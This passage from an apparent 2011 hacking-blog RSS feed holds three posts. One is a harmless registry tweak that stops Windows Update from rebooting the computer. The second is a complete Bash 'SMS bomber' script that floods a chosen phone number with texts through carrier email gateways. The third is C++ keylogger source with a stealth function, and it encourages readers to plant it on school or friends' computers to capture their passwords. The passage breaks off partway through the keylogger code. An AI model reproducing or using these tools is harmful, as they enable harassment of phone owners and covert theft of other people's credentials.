</description><link>http://pchackerz.blogspot.com/2011/09/temporarily-disable-windows-update.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-1752082145275786917</guid><pubDate>Wed, 07 Sep 2011 07:03:00 +0000</pubDate><atom:updated>2011-09-07T00:11:48.731-07:00</atom:updated><title>Prevent Windows Update from Rebooting the Computer</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;We’ve all been at our computer when the Windows Update dialog pops up and tells us to reboot our computer. I’ve become convinced that this dialog has been designed to detect when we are most busy and only prompt us at that moment.&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;The real problem comes into play when Windows gets tired of reminding us and says that the computer is going to &lt;a href=&quot;http://en.wikipedia.org/wiki/ReBoot&quot;&gt;reboot&lt;/a&gt; in 5 minutes, and the only way you can prevent the inevitable is to &lt;a href=&quot;http://pchackerz.blogspot.com/2011/09/temporarily-disable-windows-update.html&quot;&gt;temporarily disable Windows Update&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
There’s a couple of ways that we can disable this behavior, however. You’ll still get the prompt, but it won’t force you to shut down.&lt;/div&gt;
&lt;br /&gt;&lt;img src=&quot;http://www.howtogeek.com/wp-content/uploads/2007/06/image7.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
This trick should work for all versions of Windows as far as we know. You can always resort to the temporary disabling measures instead.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Manual Registry Hack&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Open up regedit.exe through the start menu search box or run dialog, and navigate down to the following key, creating new keys if they don’t exist.&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;&lt;b&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;http://www.howtogeek.com/wp-content/uploads/2007/10/image74.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Create a new 32-bit DWORD value named NoAutoRebootWithLoggedOnUsers and give it a value of 1 to prevent automatic reboot while users are logged on. Delete the value to put things back to the way they were.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Downloadable Registry Hack&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Just download and extract the registry hack files and double-click on WUNoAutoReboot.reg to disable automatic reboots. The other script will remove the hack.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.howtogeek.com/geekers/WUNoAutoReboot.zip&quot;&gt;Download WUNoAutoReboot Registry Hack&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Using Auto Reboot Remover Utility&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
If you’d rather not mess with the registry, you can use a small utility created by the guys at Intelliadmin which will make the changes for you. Just make sure you right-click and run as administrator if you are using Vista.&lt;/div&gt;
&lt;br /&gt;&lt;img src=&quot;http://www.howtogeek.com/wp-content/uploads/2007/10/image75.png&quot; /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.intelliadmin.com/Downloads.htm&quot;&gt;Download Auto Reboot Remover from Intelliadmin&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
This hack should work for the professional or business editions of XP, Vista, or even Windows Server. I’d be interested to hear your feedback in the comments.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
</description><link>http://pchackerz.blogspot.com/2011/09/prevent-windows-update-from-rebooting.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-3009992715096641044</guid><pubDate>Fri, 02 Sep 2011 11:34:00 +0000</pubDate><atom:updated>2011-09-02T04:34:40.733-07:00</atom:updated><title>Command Line SMS Bomber ( Linux )</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means &lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
A friend and I wrote this command line SMS bomber in Bash. It allows you to set the message you want to send, the phone number to send it to, the carrier of the phone (which can be found at http://www.fonefinder.net), and the delay between messages. You&#39;ll need to install &#39;ssmtp&#39;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
If you&#39;re using Ubuntu or BT4 you can type:&lt;br /&gt;&lt;br /&gt;Code:&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; line-height: 20px;&quot;&gt;sudo apt-get install ssmtp&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
You&#39;ll also need a Gmail account (I&#39;m sure you could use another e-mail service, just make changes accordingly).&lt;/div&gt;
&lt;br /&gt;Then you&#39;ll need to edit the configuration file (located at /etc/ssmtp/ssmtp.conf)&lt;br /&gt;&lt;br /&gt;Where it says:&lt;br /&gt;&lt;br /&gt;Code:&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; line-height: 20px;&quot;&gt;# The place where the mail goes. The actual machine name is required no&lt;br /&gt;# MX records are consulted. Commonly mailhosts are named mail.domain.com&lt;br /&gt;mailhub=whatever&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Change it to mailhub=smtp.gmail.com:587&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Then add this at the end of the configuration file:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Code:&lt;/div&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; line-height: 20px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;AuthUser=YOURUSERNAME@gmail.com&lt;br /&gt;AuthPass=YOURPASSWORD&lt;br /&gt;UseSTARTTLS=YES&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Then, you&#39;ll need to save the following code as whatever you want (I call it smsbomber):&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;#! /bin/bash&lt;br /&gt;&lt;br /&gt;COUNTER=0&lt;br /&gt;SPEED=2&lt;br /&gt;function usage {&lt;br /&gt;echo &quot;USAGE: $0 [OPTIONS] ... [ARGUMENTS]&quot;&lt;br /&gt;echo&lt;br /&gt;echo &quot;-p Phone Number&quot;&lt;br /&gt;echo &quot;-c Carrier Code&quot;&lt;br /&gt;echo &quot;-o Display Carrier Codes&quot;&lt;br /&gt;echo &quot;-m Message to Send&quot;&lt;br /&gt;echo &quot;-t Number of Times to Send Message&quot;&lt;br /&gt;echo &quot;-d Delay (in seconds) Between Messages&quot;&lt;br /&gt;echo &quot;-h This Help Screen&quot;&lt;br /&gt;echo&lt;br /&gt;echo &quot;You can check the carrier of a phone number&quot;&lt;br /&gt;echo &quot;at www.fonefinder.net&quot;&lt;br /&gt;echo&lt;br /&gt;echo &quot;Instead of using a preset carrier code, you&quot;&lt;br /&gt;echo &quot;can enter the SMS gateway of the carrier&quot;&lt;br /&gt;echo &quot;using the &#39;-c&#39; option.&quot;&lt;br /&gt;echo&lt;br /&gt;echo &quot;Written by MrPockets (aka GhostNode) and disk0&quot;&lt;br /&gt;exit&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;function carriers {&lt;br /&gt;echo &quot;Carrier Codes:&quot;&lt;br /&gt;echo&lt;br /&gt;echo &quot;1 AT&amp;amp;T&quot;&lt;br /&gt;echo &quot;2 Boost Mobile&quot;&lt;br /&gt;echo &quot;3 Cingular&quot;&lt;br /&gt;echo &quot;4 Nextel&quot;&lt;br /&gt;echo &quot;5 Sprint&quot;&lt;br /&gt;echo &quot;6 Verizon or Straigh Talk&quot;&lt;br /&gt;echo &quot;7 T-mobile&quot;&lt;br /&gt;echo &quot;8 TracFone&quot;&lt;br /&gt;echo &quot;9 US Cellular&quot;&lt;br /&gt;echo &quot;10 Virgin Mobile&quot;&lt;br /&gt;exit&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;if [ &quot;$1&quot; == &quot;&quot; ]; then&lt;br /&gt;usage&lt;br /&gt;fi&lt;br /&gt;while [ &quot;$1&quot; != &quot;&quot; ]; do&lt;br /&gt;case &quot;$1&quot; in&lt;br /&gt;&lt;br /&gt;&#39;-p&#39;)&lt;br /&gt;shift&lt;br /&gt;NUMBER=$1&lt;br /&gt;;;&lt;br /&gt;&#39;-c&#39;)&lt;br /&gt;shift&lt;br /&gt;case &quot;$1&quot; in&lt;br /&gt;&#39;1&#39;)&lt;br /&gt;GATEWAY=&quot;@txt.att.net&quot;&lt;br /&gt;;;&lt;br /&gt;&#39;2&#39;)&lt;br /&gt;GATEWAY=&quot;@myboostmobile.com&quot;&lt;br /&gt;;;&lt;br /&gt;&#39;3&#39;)&lt;br /&gt;GATEWAY=&quot;@cingular.com&quot;&lt;br /&gt;;;&lt;br /&gt;&#39;4&#39;)&lt;br /&gt;GATEWAY=&quot;@messaging.nextel.com&quot;&lt;br /&gt;;;&lt;br /&gt;&#39;5&#39;)&lt;br /&gt;GATEWAY=&quot;@messaging.sprintpcs.com&quot;&lt;br /&gt;;;&lt;br /&gt;&#39;6&#39;)&lt;br /&gt;GATEWAY=&quot;@vtext.com&quot;&lt;br /&gt;;;&lt;br /&gt;&#39;7&#39;)&lt;br /&gt;GATEWAY=&quot;@tmomail.net&quot;&lt;br /&gt;;;&lt;br /&gt;&#39;8&#39;)&lt;br /&gt;GATEWAY=&quot;@mmst5.tracfone.com&quot;&lt;br /&gt;;;&lt;br /&gt;&#39;9&#39;)&lt;br /&gt;GATEWAY=&quot;@email.uscc.net&quot;&lt;br /&gt;;;&lt;br /&gt;&#39;10&#39;)&lt;br /&gt;GATEWAY=&quot;@yrmobl.com&quot;&lt;br /&gt;;;&lt;br /&gt;*)&lt;br /&gt;GATEWAY=$1&lt;br /&gt;;;&lt;br /&gt;esac&lt;br /&gt;;;&lt;br /&gt;&#39;-m&#39;)&lt;br /&gt;shift&lt;br /&gt;MESSAGE=$1&lt;br /&gt;;;&lt;br /&gt;&#39;-d&#39;)&lt;br /&gt;shift&lt;br /&gt;SPEED=$1&lt;br /&gt;;;&lt;br /&gt;&#39;-t&#39;)&lt;br /&gt;shift&lt;br /&gt;TIMES=$1&lt;br /&gt;;;&lt;br /&gt;&#39;-h&#39;)&lt;br /&gt;usage&lt;br /&gt;;;&lt;br /&gt;&#39;-o&#39;)&lt;br /&gt;carriers&lt;br /&gt;;;&lt;br /&gt;*)&lt;br /&gt;usage&lt;br /&gt;;;&lt;br /&gt;esac&lt;br /&gt;shift&lt;br /&gt;done&lt;br /&gt;&lt;br /&gt;echo &amp;gt;&amp;gt; delivery&lt;br /&gt;echo &amp;gt;&amp;gt; delivery&lt;br /&gt;echo $MESSAGE &amp;gt;&amp;gt; delivery&lt;br /&gt;clear&lt;br /&gt;echo &quot; Attacking Device at: $NUMBER &quot;&lt;br /&gt;echo &quot; With Message: $MESSAGE &quot;&lt;br /&gt;&lt;br /&gt;until [ $TIMES -le $COUNTER ]; do&lt;br /&gt;ssmtp $NUMBER$GATEWAY &amp;lt; delivery sleep $SPEED COUNTER=$(($COUNTER +1)) echo ================================== echo echo &quot;Attack $COUNTER of $TIMES&quot; echo echo Message: $MESSAGE date echo &quot;Ctrl+C to call off attack&quot; echo ================================== done rm 1.txt rm delivery&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Make sure you change the permissions to make it executable:&lt;br /&gt;&lt;br /&gt;Code:&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; line-height: 20px;&quot;&gt;sudo chmod 777 smsbomber&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Then you can just type ./smsbomber or ./smsbomber -h for the help menu. You gues should be able to figure it out from there! Let me know what you think!&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
</description><link>http://pchackerz.blogspot.com/2011/09/command-line-sms-bomber-linux.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-5302954260695233412</guid><pubDate>Fri, 02 Sep 2011 11:04:00 +0000</pubDate><atom:updated>2011-09-02T04:04:43.606-07:00</atom:updated><title>Learn To create Keylogger using C++ language</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means
&lt;span class=&quot;fullpost&quot;&gt;

&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;Hi friends, the most interesting part &amp;nbsp;of the hacking is spying. &amp;nbsp;Today i am going to introduce to the C++ Spyware code. &amp;nbsp; It is going to be very fun. &amp;nbsp;You can install this spyware in your college/school &amp;nbsp;or in your friend system, and get their username and passwords. &amp;nbsp;This is very simple hacking trick when compared to phishing web page.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;i style=&quot;color: #333333; line-height: 20px;&quot;&gt;&lt;b&gt;Disadvantage of Phishing Web page:&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;&quot; name=&quot;more&quot; style=&quot;text-decoration: none;&quot;&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; You have to upload phishing web page to web hosting. &amp;nbsp;But only few website won&#39;t detect the phishing webpage.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;website url is different. Easy to detect that we are hacking.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b style=&quot;color: #333333; line-height: 20px;&quot;&gt;Advantage of Spyware-keylogger:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; Very simple and easy method.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;Victim can&#39;t detect that we are hacking.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b style=&quot;color: #333333; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b style=&quot;color: #333333; line-height: 20px;&quot;&gt;How to create Keylogger using Visual C++?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;Requirements: &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;Dev C++. &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;Download it from here:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;http://www.bloodshed.net/download.html&quot; style=&quot;color: #a91b33; line-height: 20px; text-decoration: none;&quot;&gt;http://www.bloodshed.net/&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;Knowledge about Visual C++(need, if you are going to develop the code).&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;Install dev C++ in your system and open the dev C++ compiler.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;Go to File-&amp;gt;New-&amp;gt;Source File.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;you can see a blank works space will be there in window.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; line-height: 20px;&quot;&gt;now copy the below keylogger code into the blank work space.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; line-height: 20px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; color: black;&quot;&gt;#include &amp;lt;iostream&amp;gt;&lt;br /&gt;using namespace std;&lt;br /&gt;#include &amp;lt;windows.h&amp;gt;&lt;br /&gt;#include &amp;lt;winuser.h&amp;gt;&lt;br /&gt;int Save (int key_stroke, char *file);&lt;br /&gt;void Stealth();&lt;br /&gt;&lt;br /&gt;int main()&lt;br /&gt;{&lt;br /&gt;Stealth();&lt;br /&gt;char i;&lt;br /&gt;&lt;br /&gt;while (1)&lt;br /&gt;{&lt;br /&gt;for(i = 8; i &amp;lt;= 190; i++)&lt;br /&gt;{&lt;br /&gt;if (GetAsyncKeyState(i) == -32767)&lt;br /&gt;Save (i,&quot;LOG.txt&quot;);&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;system (&quot;PAUSE&quot;);&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/* *********************************** */&lt;br /&gt;&lt;br /&gt;int Save (int key_stroke, char *file)&lt;br /&gt;{&lt;br /&gt;if ( (key_stroke == 1) || (key_stroke == 2) )&lt;br /&gt;return 0;&lt;br /&gt;&lt;br /&gt;FILE *OUTPUT_FILE;&lt;br /&gt;OUTPUT_FILE = fopen(file, &quot;a+&quot;);&lt;br /&gt;&lt;br /&gt;cout &amp;lt;&amp;lt; key_stroke &amp;lt;&amp;lt; endl;&lt;br /&gt;&lt;br /&gt;if (key_stroke == 8)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;[BACKSPACE]&quot;);&lt;br /&gt;else if (key_stroke == 